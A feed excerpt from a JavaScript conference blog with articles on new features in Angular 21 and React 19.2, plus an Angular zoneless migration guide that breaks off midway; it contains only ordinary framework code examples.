International JavaScript Conference https://javascript-conference.com/ Wed, 05 Nov 2025 13:07:25 +0000 en-US hourly 1 https://wordpress.org/?v=6.7.2 https://javascript-conference.com/wp-content/uploads/2017/03/ijs-favicon-64x64.png International JavaScript Conference https://javascript-conference.com/ 32 32 What’s New in Angular 21? https://javascript-conference.com/blog/angular-21-signal-forms-zoneless-vitest/ Wed, 05 Nov 2025 12:32:53 +0000 https://javascript-conference.com/?p=108516 Angular 21 introduces a new era of efficiency and developer-friendly design. With experimental Signal Forms and default zoneless change detection, this release focuses on performance and reactivity. Let's explore how these updates shape the framework’s future and simplify everyday development.

The post What’s New in Angular 21? appeared first on International JavaScript Conference.

]]>
If you’ve been following Angular’s journey, version 21 brings some fresh air with features that many developers have been waiting for. The long-awaited Signal Forms are finally arriving. Although they’re experimental, this feature gives a glimpse into a smoother, more reactive approach to handling forms in Angular. Meanwhile, zoneless change detection is now enabled by default, boosting the framework’s performance and making your life easier. Let’s go over some of the cool updates coming in Angular 21.

Signal Forms

Angular 21 introduces Signal Forms, an experimental but promising feature that offers a fresh, declarative, and reactive way to manage form state using signals. To better understand how Signal Forms work in practice, let’s walk through the basic steps of creating one, starting with defining your form’s state as a signal.

crewMember = signal<CrewMember>(
    {
      name: '',
      imageUrl: '',
      position: ''
    }
  );

  crewForm = form(this.crewMember);

This setup defines a signal holding the crew member’s model. You can then pass this model to Angular’s form() function to create the reactive form tree reflecting this structure.

The next step is to bind individual signal form fields to your HTML elements using the Field directive. This directive creates a two-way binding between the input element and the form’s signal model. Any changes in the input automatically update the form state, and any updates to the model immediately reflect in the input. Using it is really straightforward: just add [field] to your input elements and assign the corresponding form field. Remember to import the Field directive in your component’s imports array; otherwise, Angular won’t recognize it.

<input type="text" [field]="crewForm.name" placeholder="Enter pirate name">
<input type="url" [field]="crewForm.imageUrl" placeholder="Enter image URL">
<input type="text" [field]="crewForm.position" placeholder="Enter crew position">
…
<!--Preview-->
<div>
   <p>Name: {{ crewForm.name().value() }}</p>
   <p>Position: {{ crewForm.position().value() }}</p>
</div>
<img [src]="crewMember().imageUrl">

In this example, you can see inputs bound to the crewForm fields for name, image URL, and position. Just below, there’s a live preview that shows how you can display the current form values by accessing crewForm.name().value() or crewForm.position().value(). Similarly, the image URL is read from the original crewMember signal, demonstrating how both the crewForm and the crewMember signal stay in sync.

Signal Form live preview

Figure 1: Signal Form live preview

Validation

To add validation in Signal Forms, pass a schema function into the form() method. The function can include built-in validators, such as required, email, or minLength, alongside your own custom validation logic. Error messages can be customized via options, allowing friendly and precise feedback for users interacting with forms.

crewForm = form(this.crewMember, (path) => {
    required(path.name, { message: 'Name is required' });
    minLength(path.name, 2, { message: 'Name must be at least 2 characters long' });
    required(path.position, { message: 'Position is required' });
    required(path.imageUrl, { message: 'Image URL is required' });
  });

To show validation errors for a form field, first check if the field has been touched (if the user has interacted with it) and is currently invalid. This prevents displaying errors like ‘required’ prematurely before the user starts typing.

You can get the list of errors for the field by accessing its errors() signal, and then display the error message.

@if(crewForm.name().touched() && crewForm.name().invalid()) {
     <ul class="error-message">
       @for(error of crewForm.name().errors(); track $index) {
            <li>{{ error.message }}</li>
       }
     </ul>
 }

Signal Form validation errors

Figure 2: Signal Form validation errors

These examples illustrate the basic usage of Signal Forms to demonstrate core concepts. Check the Angular official docs to learn more about Signal Forms and their evolving functionality. Since this is an experimental API, expect some changes, but also a bright future for building forms declaratively and reactively.

Zoneless by default

Starting with Angular 21, zoneless change detection is now enabled by default. No more Zone.js dependency. The Zoneless API has been stable since Angular 20.2, but version 21 takes it further: there’s no need to import provideZonelessChangeDetection in your app config, as all new Angular applications are now zoneless out of the box.

In a zoneless app, change detection no longer triggers automatically on every async task, like HTTP requests, observables, or timers such as setTimeout or setInterval. This is a big shift compared to how Zone.js worked. Now, change detection runs only when explicitly triggered by certain actions, including:

  • Async pipe
  • User-bound events like clicks or input events
  • Signal value update used in the template
  • markForCheck()
  • call to ComponentRef.setInput()

Going zoneless breaks free from the old Zone.js magic, so change detection fires only on explicit triggers you control, avoiding unnecessary change detection cycles and resulting in better app performance. Removing Zone.js also shrinks the bundle size, which improves Core Web Vitals. Debugging gets cleaner as well, since stack traces are no longer polluted by Zone.js. For best performance, pairing zoneless mode with the OnPush strategy is highly recommended.

Another important advantage is improved compatibility with the wider ecosystem. Since Zone.js patches browser APIs, it sometimes struggles to keep up with new APIs or modern JavaScript features like async/await, which require special handling. Eliminating Zone.js removes this layer of complexity, leading to better long-term maintainability and fewer compatibility headaches.

For in-depth details, migration advice, and performance insights, check out my full guide.

Vitest – New Default Testing Framework

Angular 21 introduces Vitest as the new standard testing framework, replacing Jasmine and Karma for newly created projects. This shift comes after years of uncertainty following Karma’s deprecation in 2023, providing Angular developers with a clear, modern, and efficient testing solution.

Key Benefits:

  • Fast test runs powered by the Vite build tool
  • Native support for TypeScript and ESM
  • Real browser environment testing
  • Modern and rich API

Angular’s move to Vitest means better alignment with the modern JS ecosystem, and future migration utilities will ease switching from Jasmine. Developers will run tests the same way with ng test. Importantly, Jasmine and Karma can still be chosen instead of Vitest if needed.

The Vitest test result in console

Figure 3: The Vitest test result in console

Angular ARIA

Angular ARIA is a library created in response to developer requests for accessible components that are simpler to style. It provides a collection of headless Angular directives implementing common accessibility patterns without any predefined styles, allowing developers full control over styling.

Currently, the Angular ARIA library includes accessible directives for the following UI components:

  • Accordion
  • Combobox
  • Listbox
  • Radio Group
  • Tabs
  • Toolbar
<div ngListbox>
      @for (item of crew.value(); track item.id) {
        <div [value]="item.name" ngOption>{{ item.name }}</div>
      }
    </div>

ARIA roles and attributes automatically added by using Angular ARIA directives

Figure 4: ARIA roles and attributes automatically added by using Angular ARIA directives

Other Improvements

Angular 21 goes beyond major new features by delivering various improvements, migrations, and quality enhancements that together modernize and optimize Angular apps.

  • The HttpClient is built in by default, so new projects no longer require manual setup of provideHttpClient().
  • Migration Scripts:
    • Migration from NgClass to class bindings:
      ng generate @angular/core:ngclass-to-class
    • Migration from NgStyle to style bindings:
      ng generate @angular/core:ngstyle-to-style
    • Migration of RouterTestingModule usages inside tests to RouterModule:
      ng generate @angular/core:router-testing-module-migration
    • Replacement of CommonModule imports with standalone imports:
      ng generate @angular/core:common-to-standalone
  • CLI support for Tailwind CSS config generation, making it easier to set up Tailwind CSS in Angular projects right from project creation.

CLI support for Tailwind CSS config generation

Figure 5: CLI support for Tailwind CSS config generation

In addition to these changes, Angular 21 includes numerous bug fixes, performance improvements, and developer experience enhancements that make the framework more stable, efficient, and user-friendly.

Conclusion

Angular 21 delivers a thoughtful balance of innovation and refinement, introducing tools that make modern app development more efficient and enjoyable. Signal Forms, Vitest, default zoneless mode, and Angular ARIA directives all emphasize what this update is about: speed, clarity, and accessibility.

Angular continues to prove that a mature framework can still innovate, adapt, and surprise.

References

  1. Angular documentation
  2. ng-conf 2025 LIVE Angular Team Keynote
  3. Vitest documentation

 

🔍 Frequently Asked Questions (FAQ)

1. What are Signal Forms in Angular 21?

Signal Forms in Angular 21 introduce a new, reactive way to manage form state using signals. This experimental feature allows developers to declaratively define forms that remain synchronized with their underlying signal-based model, enabling more efficient and readable form handling.

2. How do you bind fields in a Signal Form?

Angular 21 uses the Field directive for two-way binding between form inputs and signal-based models. Developers add [field] to input elements and map them to specific fields in the Signal Form, ensuring real-time updates between the view and data model.

3. How is validation implemented in Signal Forms?

Validation in Signal Forms is added via a schema function passed to the form() method. This function can include Angular’s built-in validators and custom messages, allowing for tailored and user-friendly error feedback displayed only after user interaction.

4. What is zoneless change detection in Angular 21?

Zoneless change detection is now enabled by default in Angular 21, removing the dependency on Zone.js.. Change detection no longer triggers on all async operations but instead activates explicitly, resulting in improved performance, cleaner stack traces, and smaller bundle sizes.

5. How does zoneless mode improve app performance?

By removing Zone.js, Angular avoids unnecessary change detection cycles and reduces overhead. Performance improves as detection is limited to explicit triggers such as markForCheck(), async pipes, or template-bound signal updates.

6. Why did Angular 21 switch to Vitest for testing?

Angular 21 adopts Vitest as the default testing framework for new projects. Vitest offers fast execution via Vite, native TypeScript and ESM support, and a modern API aligned with current JavaScript testing trends.

7. What is Angular ARIA and what components does it support?

Angular ARIA is a new library offering headless directives for accessible components without enforced styling. It currently supports Accordion, Combobox, Listbox, Radio Group, Tabs, and Toolbar, enhancing accessibility while preserving design flexibility.

8. What CLI migration tools are available in Angular 21?

Angular 21 includes CLI commands for migrating NgClass, NgStyle, and RouterTestingModule usage, and for replacing CommonModule with standalone imports. It also adds CLI support for generating Tailwind CSS configuration during project setup.

9. What are the benefits of removing Zone.js from Angular apps?

Removing Zone.js simplifies debugging, reduces bundle size, enhances compatibility with modern browser APIs, and improves Core Web Vitals. It also future-proofs Angular applications against changes in JavaScript runtime behavior.

10. What should developers consider when adopting Signal Forms?

As an experimental API, Signal Forms may evolve in syntax or behavior. Developers should refer to the latest Angular documentation and be cautious when using it in production, while leveraging its benefits for cleaner, reactive form logic.

The post What’s New in Angular 21? appeared first on International JavaScript Conference.

]]>
React 19.2 Explained: Updates, Impact, and What to Watch For https://javascript-conference.com/blog/react-19-2-updates-performance-activity-component/ Sun, 26 Oct 2025 17:30:22 +0000 https://javascript-conference.com/?p=108484 React 19.2 brings targeted improvements to performance, rendering, and overall developer experience. Key highlights include updates to the core library and optimizations in React DOM for faster, more efficient UI rendering. Let’s take a closer look at what’s new.

The post React 19.2 Explained: Updates, Impact, and What to Watch For appeared first on International JavaScript Conference.

]]>
What a month for the React ecosystem! On October 7th at the React Conference in Henderson, Nevada, the React Foundation was announced, marking a new era of technical governance for the library and its related projects, including JSX. The founding members include Amazon, Callstack, Expo, Meta, and Vercel, with Expo and Callstack representing major players in the React Native space.

Just a few days before that, the React Team released version 19.2. This release brings new features for component rendering and better performance tools.

These days, most developers start React projects using frameworks like Next.js. On the 9th of October, the team announced the beta for Next.js version 16, which will bake in support for React 19.2. With major support coming soon, let’s look at what’s new in React 19.2 and how you can use these updates in everything from side projects to production grade applications.

Preface

The changes to React 19.2 can be broken down into three core categories:

  • Updates to the React core library
  • Changes to React DOM, the package that enables React to update and render UI components to the web browser by interacting with the browser’s Document Object Model
  • Improvements to existing features from previous changes, such as batched Suspense updates

I’m keeping these categories separate because React isn’t limited to the web. For example, Meta once maintained react-360 for VR content, though it was deprecated in 2020. Today, React can render to formats such as PDF and the Command Line Interface (CLI), among others. There’s a whole host of options that can be found in the chentsulin/awesome-react-renderer GitHub repository. As a result, updates to the core library provide benefits that extend beyond web applications.

What’s new in the Core Library?

The < Activity/> Component

In declarative, state-driven architectures like React, the UI reflects the current state at any given time. To help illustrate this, imagine a dashboard application with a collapsible sidebar menu. Users often interact with such a UI by toggling the visibility of the sidebar based on their needs. Conditional rendering lets you express how different states map to different UI structures.

For example:

const HomePage = () => {
 const [isVisible, setIsVisible] = useState(false)

 return (
   <>
     {isVisible && <Sidebar/>}
     <button onClick={setIsVisible((state) => !state)}>Toggle Show Sidebar</button>
   </>
 )
}

When isVisible transitions from true to false, the component unmounts, and all Effects are destroyed, which cleans up any active subscriptions. No subsequent rendering or state changes can occur.

But by taking this approach, you’re missing out on a couple of features. For instance, if you wanted to temporarily hide a sidebar, but maintain its state (like the open tabs, the scroll position, the form inputs), you only have two options:

  1. Unmount the component → state lost, effects destroyed.
  2. Hide the component with CSS → state preserved, but effects (like subscriptions, event listeners, polling) continue running in the background, wasting resources.

Because React is just JavaScript, there was no built-in way to visually hide something and safely suspend its effects.

Until now. The new < Activity/> component lets you hide and later restore a component, preserving the internal state of its child components.

const HomePage = () => {
 const [isVisible, setIsVisible] = useState(false);

 return (
   <>
     <Activity mode={isVisible ? "visible" : "hidden"}>
       <Sidebar />
     </Activity>
     <button onClick={() => setIsVisible((state) => !state)}>
       Toggle Show Sidebar
     </button>
   </>
 );
};

When the mode prop is set to hidden, the child components are hidden using the display: “none” CSS property, which removes the elements from the document and frees their original space. This is different from the visibility: hidden CSS property, which hides elements but retains their space in the layout.

While hidden, child components continue to re-render in response to new props, but at a lower priority compared to visible content.

When the boundary becomes visible again, React reveals the child components with their previous state restored and re-creates their Effects. Meaning, until we want to make the component visible again, there are no unwanted side effects.

In practice, when the < Sidebar /> component is in mode=”visible”, any navigation items that are expanded or collapsed will preserve their state. If the sidebar becomes hidden and then visible again, those items will remain in the same open or closed state they were in before.

Another way to see this is that the < Activity /> component manages background UI processes. Instead of discarding interface elements that are temporarily out of view, React shifts them into a controlled, low-priority state. The idea is closer to an operating system moving a task to the background queue; its memory and context remain intact, and it can still perform lightweight updates when needed, but it yields most of the CPU to the active, foreground tasks.

Preparing content by pre-rendering with < Activity/>

Sometimes you don’t just want to hide content, you want to prepare it. The < Activity/> component can pre-render components that will soon become visible.

This has great implications for dependency lazy loading or data pre-fetching, leading to reduced loading times.

For example, let’s assume we have a sidebar with items defined and loaded from a CMS. If we wanted to prefetch data before it becomes visible, we could render it inside an < Activity mode=”hidden”> boundary.

This allows React to start fetching data in the background using the use() hook. So by the time users open the sidebar, the data is already available and rendered, and it feels instant.

const sidebarDataPromise = fetchSidebarData()

function Sidebar() {
 const data = use(sidebarDataPromise)
 return (
   <nav>
     {data.items.map((item) => (
       <a key={item.id} href={item.href}>
         {item.label}
       </a>
     ))}
   </nav>
 )
}

TanStack Query gotchas

The caveat to not having effects running in “hidden” mode is that any data fetching relying on running within an effect won’t be able to take advantage of the pre-rendering capabilities of the < Activity/> component. This includes, but not limited to, the useQuery hook from TanStack query, which uses a useEffect under the hood. To take advantage of this pattern with the commonly used TanStack query asynchronous state management libraries, which would also then cache the fetched data in-memory for further optimization and guarding against refetching non-stale data, you could make use of queryClient.prefetch.

const SIDEBAR_QUERY_KEY = 'sidebar';

function Sidebar() {
 const queryClient = useQueryClient()

 const data = use(queryClient.ensureQueryData({
   queryKey: [SIDEBAR_QUERY_KEY],
   queryFn: fetchSidebarData,
 }))

 return (
   <nav>
     {data.items.map((item) => (
       <a key={item.id} href={item.href}>
         {item.label}
       </a>
     ))}
   </nav>
 )
}

An added benefit of pre-fetching with TanStack query here is that any other components subscribing to the same query key will benefit from the data having a warm cache ready to go.

The useEffectEvent Hook

If you’ve ever written a useEffect that connects to an external system, say a WebSocket, a stream, or a DOM event, you’ve probably had to battle the dependency array. The typical problem is that you want to react to something external, but the effect keeps re-running every time one of your props or state values changes. You either end up reconnecting too often or disabling the lint rule, which may leave you in the dark as the dependencies continue to grow and evolve.

Take this great example from the React Docs: you’re building a chat app, and when a user joins a new room, you want to show a notification once the connection is ready:

function ChatRoom({ roomId, theme }) {
 useEffect(() => {
   const connection = createConnection(serverUrl, roomId);
   connection.on('connected', () => {
     showNotification('Connected!', theme);
   });
   connection.connect();
   return () => connection.disconnect();
 }, [roomId, theme]);
}

This looks fine, but there’s a subtle issue. If the user switches between light and dark themes while the chat is connected, the entire effect re-runs, disconnecting and reconnecting the socket, just to show the notification with the right color. It’s probably not what you were going for. The connection should only reset when roomId changes, not because of theming. What most would do in this case is remove the theme from the dependency array. However, that results in a linter warning, and you ultimately will have to disable it with a comment.

This is where useEffectEvent shines. It lets you separate the “event reaction” logic from the “effect setup” logic, so React can handle updates to values like theme without forcing a teardown and reconnect.

Here’s the same example rewritten:

function ChatRoom({ roomId, theme }) {
 const onConnected = useEffectEvent(() => {
   showNotification('Connected!', theme);
 });

 useEffect(() => {
   const connection = createConnection(serverUrl, roomId);
   connection.on('connected', () => onConnected());
   connection.connect();
   return () => connection.disconnect();
 }, [roomId]); // ✅ Effect runs only when roomId changes
}

The key difference is that the onConnected callback always “sees” the latest theme, but the effect itself remains stable because the event handler’s identity never changes. React treats useEffectEvent callbacks as stable by design, meaning they don’t need to appear in dependency arrays.

This pattern is incredibly useful in real apps. Think about analytics events, WebSocket subscriptions, or integrations with browser APIs. You often need to respond to events (connection open, visibility change, playback start, etc.) without tearing down your entire effect tree every time an unrelated prop changes.

So if you’ve been in the habit of sprinkling eslint-disable-next-line react-hooks/exhaustive-deps above every useEffect that listens to external events, this new addition to React’s collection of hooks finally makes that unnecessary. Just make sure to upgrade your eslint-plugin-react-hooks to latest.

Improving cache management with cacheSignal in React Server Components

The cache() function, used exclusively with React Server Components (RSCs), allows you to memoize the results of data fetching or expensive computations across requests. Starting with React 19.2, the core library introduces a new companion API, cacheSignal(), to complement the existing cache() API and provide greater control over cache lifecycles.

In short, cacheSignal() gives you an AbortSignal that matches the cache’s lifetime. When the cache expires, the signal is aborted, so any ongoing operations like fetch() calls can be cancelled smoothly.

This idea isn’t new – using abort signals is a common practice on the client side, with fetch requests that occur within effects and abort signals that allow for the correct cleanup to occur so that when a component unmounts, there aren’t any wasted resources. Now it’s built into React’s cache and rendering system.

Here’s an example:

const getUser = cache(async (id: string) => {
 const signal = cacheSignal();

 const response = await fetch(`/users/${id}`, { signal });

 if (!response.ok) {
   throw new Error(`Failed to fetch user: ${response.status}`);
 }

 return response.json();
});

export async function UserProfile({ id }: { id: string }) {
 const user = await getUser(id);

 return (
   <section>
     <h2>{user.name}</h2>
     <p>{user.email}</p>
   </section>
 );
}

In this example:

  • getUser is wrapped in cache(), which deduplicates calls with the same arguments within React’s server cache scope.
  • Inside getUsercacheSignal() returns an AbortSignal that React will abort after rendering is conclusive. This occurs in one of three scenarios:
    • React has successfully completed rendering.
    • The render was aborted.
    • The render has failed.
  • Passing that signal to fetch() ensures that any pending network requests are immediately canceled if the render is aborted, fails, or completes.

While cacheSignal() currently only operates within the RSC environment and returns null on the client, in the official documentss, the React team has indicated plans to extend its availability to Client Components in future releases.

Performance profiling gets new powers

Chrome provides the ability to customize performance data via its extensibility API, which, with React 19.2, is finally being taken advantage of. Previously, the performance panel showed flame charts for JavaScript, layout, and paint events, but not what React was doing internally. You could see when the browser was busy, but not why.

The React DevTools Profiler, added in version 16.5, helped fill some gaps, but only from React’s point of view. It showed which components rendered, how long each render took, and what triggered them. This was useful for seeing what React did, but we were still missing info on when or how it worked with the browser. The Profiler was separate from the browser’s performance timeline, so you couldn’t match React’s scheduling with main-thread tasks or paint events.

This separation made it hard to understand concurrency and scheduling. For example, if interactions were slow, you couldn’t tell if React was blocked by the browser, yielding work, or just handling a low-priority update.

React 19.2

Figure 1: React Performance Tracks (Source)

React 19.2 changes this by adding React Performance Tracks to Chrome DevTools’ Performance panel. This bridges the gap between React’s scheduler and the browser’s timeline. Now, you can see React’s priorities, renders, and effects right next to standard performance data, giving you a clear view of how React works frame by frame.

The tracks are broken down into the Scheduler track and the Component track:

  • Scheduler: visualizes React’s internal priorities like blocking and transition updates, showing when work starts, pauses, and completes.
  • Components: shows which components are rendering or running effects.

What’s new with React DOM?

Partial Pre-rendering

Partial pre-rendering first came as an experimental feature in Next.js 14. And now, with React 19.2, it’s shipping as part of the react-dom package, bringing a new rendering model to React that allows you to combine the benefits of static and dynamic rendering.

This provides a new level of flexibility, combining the performance benefits of Static Site Generation (SSG), where an entire route is rendered to static HTML, with the freshness of Server-Side Rendering (SSR), which re-renders the page on each request.

In a nutshell, with Partial Pre-rendering:

  • React pre-renders as much of the page as possible ahead of time (the static shell).
  • The parts that depend on live data or user-specific information are left as “holes” (Suspense boundaries).
  • When a request arrives, React resumes rendering the postponed (dynamic) parts on the server from the saved state, then streams the completed output to the browser.

This can be great for use cases such as E-commerce product pages, where product details like the title, description, and images rarely change, whereas pricing, localization, and stock generally do. With partial pre-rendering, you can serve a cached static shell instantly from a CDN to ensure the initial UI renders quickly and is close to the end user. Then, you can resume rendering only the dynamic components, such as price and stock, when the request hits the server.

Wrapping up

Beyond the core library and DOM package updates, the React team sprinkled in a few updates around batching suspense boundaries, web stream support for Node, eslint-plugin-react-hooks, and more!

As of October 20, 2025, 66.8% of websites using React are still on the 2017 release, version 16, and 10.9% on version 18, according to W3Techs. There’s still some time before these features will hit scale on the majority of production-grade applications. But that doesn’t mean it’s not important to get familiarized with what’s possible and to learn the concepts early. Isn’t that the perfect excuse to play around with them in a side project?

 

🔍 Frequently Asked Questions (FAQ)

1. What is new in React 19.2?

React 19.2 introduces key improvements to component rendering, performance profiling, and developer experience. Major updates include the <Activity /> component, useEffectEvent hook, cacheSignal() for RSCs, and partial pre-rendering support in React DOM.

2. How does the <Activity /> component work in React 19.2?

The new <Activity /> component enables developers to hide and later restore UI components while preserving their internal state and effects. It uses display: "none" for layout exclusion and allows low-priority updates in the background, optimizing performance without resource waste.

3. What are the benefits of pre-rendering with <Activity />?

<Activity mode="hidden"> allows React to prepare hidden components in advance, improving user experience through faster display of content. This is particularly useful for lazy-loading data or UI components, leveraging features like use() or queryClient.prefetch with TanStack Query.

4. What problem does useEffectEvent solve in React?

useEffectEvent decouples event logic from effect setup, preventing unnecessary re-renders caused by changing props or state. It offers a stable reference for event callbacks, improving code stability and reducing the need to disable lint rules.

5. How does cacheSignal() improve cache control in React Server Components?

cacheSignal() returns an AbortSignal tied to the lifecycle of React’s server-side cache. When rendering concludes or fails, any fetch requests using this signal are aborted, avoiding unnecessary network usage and improving memory efficiency.

6. What is partial pre-rendering in React 19.2?

Partial pre-rendering allows React to pre-render static parts of a page and defer dynamic rendering using Suspense boundaries. This enables hybrid rendering models that combine the speed of static pages with the freshness of dynamic content.

7. How does React 19.2 improve performance profiling in Chrome DevTools?

React 19.2 introduces React Performance Tracks in Chrome DevTools’ Performance panel. These tracks provide visibility into React’s scheduler and component behavior, enabling better debugging of concurrency and rendering timing.

8. What is the relationship between React 19.2 and Next.js 16?

Next.js 16, announced in beta shortly after React 19.2, bakes in support for the latest React version. This close alignment ensures seamless integration for developers using modern React features in production-ready applications.

9. What limitations exist with TanStack Query and <Activity />?

Because TanStack Query’s useQuery relies on useEffect, it cannot run during hidden-mode pre-renders. Developers must use methods like queryClient.ensureQueryData for preloading and caching data outside the effect lifecycle.

10. Why is the React Foundation significant?

Launched alongside React 19.2, the React Foundation formalizes community governance and includes major stakeholders like Meta, Amazon, Vercel, and Expo. It strengthens React’s roadmap transparency and long-term ecosystem alignment.

The post React 19.2 Explained: Updates, Impact, and What to Watch For appeared first on International JavaScript Conference.

]]>
No More Zone.js: A Better Way to Build Angular Apps with Angular 20.2 https://javascript-conference.com/blog/angular-20-zoneless-mode-performance-migration-guide/ Thu, 09 Oct 2025 08:40:28 +0000 https://javascript-conference.com/?p=108437 Zone.js has been at the heart of Angular’s change detection since the beginning, but the framework is moving forward. With the introduction of zoneless mode and signals, Angular now supports a reactivity model that is simpler, faster, and more explicit. This article shows what changes when you drop Zone.js, how to refactor your app, and how to work effectively with the new change detection model. You'll see what breaks, what improves, and how to rethink your app's reactivity when Zone.js is no longer in control.

The post No More Zone.js: A Better Way to Build Angular Apps with Angular 20.2 appeared first on International JavaScript Conference.

]]>
For years, Zone.js powered Angular’s “magic refresh,” keeping apps in sync without extra effort. It worked by patching async browser APIs and notifying Angular whenever something might have changed. While this made development smoother, it also came with trade-offs: unnecessary change detection cycles and debugging complexity. Now, Angular 20.2 marks a turning point. Zoneless mode is stable, opening the door to a leaner and more predictable way of building Angular apps.

What is Zone.js and How Does it Work?

Before we talk about going zoneless, let’s recall what Zone.js actually is and does. It’s a library that monkey-patches asynchronous browser APIs such as setTimeout, promises, DOM events, and HTTP requests. Each time one of these is completed, it notifies Angular that “something might have changed.” But Zone.js couldn’t provide details about what changed or where. As a result, Angular had to trigger change detection across the whole component tree to make sure the UI stayed in sync.

That trade-off defined much of the Angular developer experience. On the bright side, Zone.js made things feel almost magical, the UI updated automatically whenever async code finished, and you didn’t have to think about it. This simplicity was especially appealing in Angular’s early days, when developers could focus on building features instead of worrying about change detection triggers.

But the magic came with a price. Zone.js treated every async event as a possible change, which meant Angular often did more work than necessary. Over time, that extra overhead slowed apps down and made debugging harder.

For years, developers enjoyed the “magic” of Zone.js but also dealt with its drawbacks. Here is some good news: Angular has been evolving to eliminate this dependency, and with Angular 18, we see the first experimental steps toward a zoneless future.

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

Angular Zoneless – From Experimental to Stable

The idea of running Angular without Zone.js has been a long-awaited change in the framework’s evolution. Back in Angular 18, the team introduced the first experimental APIs for zoneless mode, which allowed us to explore a world where change detection was no longer tied to Zone.js patching every asynchronous operation in the browser.

With the release of Angular 20.2, these APIs became stable, and we can now confidently build production applications in zoneless mode. Instead of relying on Zone.js, we work with an explicit change detection model where updates are triggered by signals, template events, async pipes, and manual checks when necessary.

This naturally raises the next question: why should we go zoneless, and what do we actually gain by removing Zone.js from our applications?

Why go zoneless?

So why should we drop Zone.js now that we finally can? The main reasons come down to leaner applications, improved performance, and more predictable behavior.

Benefits of going zoneless

  • Reduced bundle size and faster initial load: Without Zone.js, the bundle shrinks by about 33 KB. That’s not huge on its own, but it translates directly into a faster initial load, since the browser no longer has to download and parse the library.

Initial bundle size with Zone.js

Figure 1: Initial bundle size with Zone.js

Initial bundle size in zoneless app

Figure 2: Initial bundle size in zoneless app

  • Better performance: Zone.js often triggered unnecessary change detection cycles, even when no data had changed. Zoneless mode removes that overhead. Change detection now runs only when it actually needs to, giving us more predictable and performant rendering.
  • Easier debugging: With Zone.js gone, stack traces are no longer wrapped in Zone-specific frames. You get a full, accurate stack trace that points exactly to where something happened. No more extra noise. This makes debugging and profiling significantly easier.
  • Full control over reactivity: In zoneless Angular, the developer explicitly decides when the UI should update. This is a major shift – instead of relying on Zone.js “magic,” you know exactly what triggers change detection and when it happens. That makes the app’s reactivity model both transparent and intentional.

Trade-offs to keep in mind

  • You may need to adjust your mental model. Without automatic change detection, you must adopt a more deliberate strategy for updating the UI. That means paying more attention to using signals, async pipes, or calling markForCheck when necessary.
  • Migration effort: migrating a large app can take time, especially if it’s heavily tied to Zone.js behaviors and doesn’t use signals and onPush change detection strategy.

Create a zoneless project

Starting a zoneless project is surprisingly simple. In Angular v20.2, you can enable zoneless mode directly when you are creating a new project using CLI:

Create zoneless project with zoneless flag

Figure 3: Create zoneless project with zoneless flag

If you skip the flag, the Angular CLI will ask you a question during project setup:

Create zoneless app - CLI zoneless question

Figure 4: Create zoneless app – CLI zoneless question

Select “Yes” and you will get a project fully Zone.js free!

Migration to zoneless

If you already have an Angular project and want to migrate to zoneless, the process takes a few steps:

  • In app.config.ts, swap: provideZoneChangeDetection({ eventCoalescing: true }) → provideZonelessChangeDetection()

Switch to zoneless provider in app.config.ts

Figure 5: Switch to zoneless provider in app.config.ts

  • Remove zone.js from angular.json build and test configs.

Remove zone.js from build config in angular.json

Figure 6: Remove zone.js from build config in angular.json

Remove zone.js and zone.js/testing from test config in angular.json

Figure 7: Remove zone.js and zone.js/testing from test config in angular.json

  • Delete imports: import zone.js and import zone.js/testing.
  • Uninstall Zone.js. Once nothing depends on it anymore, uninstall it.

Uninstall Zone.js

Figure 8: Uninstall Zone.js

  • Verify in the browser. Open your app in the browser, open the console, and type Zone. You should get an error: Zone is not defined. That confirms Zone.js has been fully removed.

Checking in the browser console if Zone.js is still available in the app

Figure 9: Checking in the browser console if Zone.js is still available in the app

How Change Detection Works Without Zone.js

Once Zone.js is gone, Angular no longer “guesses” when to refresh the UI. Instead, the framework listens to specific, intentional triggers that tell it exactly when change detection should run. So what are the actual triggers that make Angular run change detection without Zone.js?

Change detection triggers

  • Bound host or template event listeners
<button class="refill-button" (click)="refillRum()">Refill Barrel</button>

@HostListener('click')
  refillRum(): void {
    this.rumService.refillRum();
  }
  • Async pipe calls ChangeDetectorRef.markForCheck() under the hood whenever the observed value changes, ensuring your template reflects the new data.
@for(location of treasureLocations$ | async; track location.id) {
      <!—Treasure location content -->
}
  • Updating a signal used in a template
  • ComponentRef.setInput(): When you programmatically set an input on a dynamically created component, Angular marks that view as dirty and schedules change detection.
  • Manual call of ChangeDetectorRef.markForCheck(): While Angular handles change detection automatically in most cases, you can still force it with markForCheck(), ensuring Angular picks up changes it wouldn’t catch otherwise.

It’s important to understand that going zoneless doesn’t rewrite Angular’s change detection model from scratch. The two familiar strategies, Default and OnPush, are still in place, and their behavior hasn’t changed. What changed is when the change detection process starts.

  • Default strategy: With the default mode, Angular still walks the component tree from top to bottom, checking each view to see if updates are needed. Zoneless or not, this part works exactly the same.

Default change detection

Figure 10: Default change detection – Trigger change detection by click event

In Figure 10, we see a zoneless application’s component tree, where all components use the default change detection strategy. When a user clicks a button inside one of the child components, the click event triggers change detection.

In the next step (Figure 11), Angular marks the component where the click happened, together with all of its ancestors up to the root, as dirty. Then Angular runs the change detection process (Figure 12).

The key difference is only in how change detection is triggered. Zone.js used to fire it on every patched async operation, while zoneless relies on explicit triggers like user events, signals, or async pipe.

Finally, it’s worth clarifying that Angular never “re-rendered” components. That’s a common misconception. Angular simply checks bindings, and if a change is detected, it updates only the affected DOM nodes.

Default change detection - Mark View Dirty

Figure 11: Default change detection – Mark View Dirty

Default change detection - components checked

Figure 12: Default change detection – components checked

  • onPush strategy: With OnPush, Angular checks only those components that have been explicitly marked as dirty.

onPush change detection - trigger change detection by click event

Figure 13: onPush change detection – trigger change detection by click event

Let’s look at a mixed setup: some components use OnPush, others stick to the default strategy (Figure 13). A user clicks a button inside an OnPush component. Angular marks that component and its ancestors dirty, same as before (Figure 14).

onPush change detection - Mark View Dirty

Figure 14: onPush change detection – Mark View Dirty

But here’s the twist. With OnPush, Angular only checks components that are actually marked as dirty. If an OnPush component isn’t marked dirty, Angular skips it entirely, along with all of its children (Figure 15). In our case, the parent of the clicked component is OnPush and marked dirty, so Angular checks it, and because that parent has another child using the default strategy, that sibling gets checked as well.

onPush change detection - components checked

Figure 15: onPush change detection – components checked

  • Local change detection with OnPush + Signals: Imagine we have a component tree where all components use OnPush change detection and rely on signals in their templates (Figure 16).

"Local" change detection - onPush + signal change + async task

Figure 16: “Local” change detection – onPush + signal change + async task

